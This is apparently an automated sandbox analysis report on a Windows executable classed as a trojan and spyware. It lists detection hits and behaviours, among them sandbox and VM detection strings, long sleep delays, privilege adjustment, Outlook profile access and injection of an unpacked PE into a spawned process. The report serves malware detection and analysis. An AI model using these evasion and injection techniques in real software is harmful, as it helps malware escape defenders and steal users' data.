Code function: 9_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

9_2_0040650A

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZciowjM9hN.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@49/4

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Code function: 9_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

9_2_0040434D

Source: ZciowjM9hN.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: ZciowjM9hN.exe	String found in binary or memory: Self-Help PDF
Source: ZciowjM9hN.exe	String found in binary or memory: Self-help PDF
Source: ZciowjM9hN.exe	String found in binary or memory: Self-Help PDF
Source: ZciowjM9hN.exe	String found in binary or memory: Self-help PDF
Source: ZciowjM9hN.exe	String found in binary or memory: Self-Help PDF
Source: ZciowjM9hN.exe	String found in binary or memory: Self-help PDF

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: ZciowjM9hN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ZciowjM9hN.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3beb450.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3c05470.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZciowjM9hN.exe PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZciowjM9hN.exe PID: 6976, type: MEMORYSTR

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: 9_2_00402AC0 push eax; ret		9_2_00402AD4
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: 9_2_00402AC0 push eax; ret		9_2_00402AFC

Source: initial sample

Static PE information: section name: .text entropy: 7.624251253975701

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZciowjM9hN.exe PID: 6328, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ZciowjM9hN.exe, 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: ZciowjM9hN.exe, 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\ZciowjM9hN.exe TID: 6332	Thread sleep time: -43731s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe TID: 6356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe TID: 6980	Thread sleep time: -240000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Code function: 9_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

9_2_00403D74

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Thread delayed: delay time: 43731	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: ZciowjM9hN.exe, 00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ZciowjM9hN.exe, 00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: ZciowjM9hN.exe, 00000000.00000003.309990373.0000000003C0C000.00000004.00000800.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000000.00000002.323829302.0000000007470000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OqEmUqvSVo
Source: ZciowjM9hN.exe, 00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: ZciowjM9hN.exe, 00000009.00000002.545669843.00000000016A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ZciowjM9hN.exe, 00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Code function: 9_2_00402B7C GetProcessHeap,RtlAllocateHeap,

9_2_00402B7C

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Code function: 9_2_0040317B mov eax, dword ptr fs:[00000030h]

9_2_0040317B

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Memory written: C:\Users\user\Desktop\ZciowjM9hN.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Process created: C:\Users\user\Desktop\ZciowjM9hN.exe C:\Users\user\Desktop\ZciowjM9hN.exe

Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Users\user\Desktop\ZciowjM9hN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
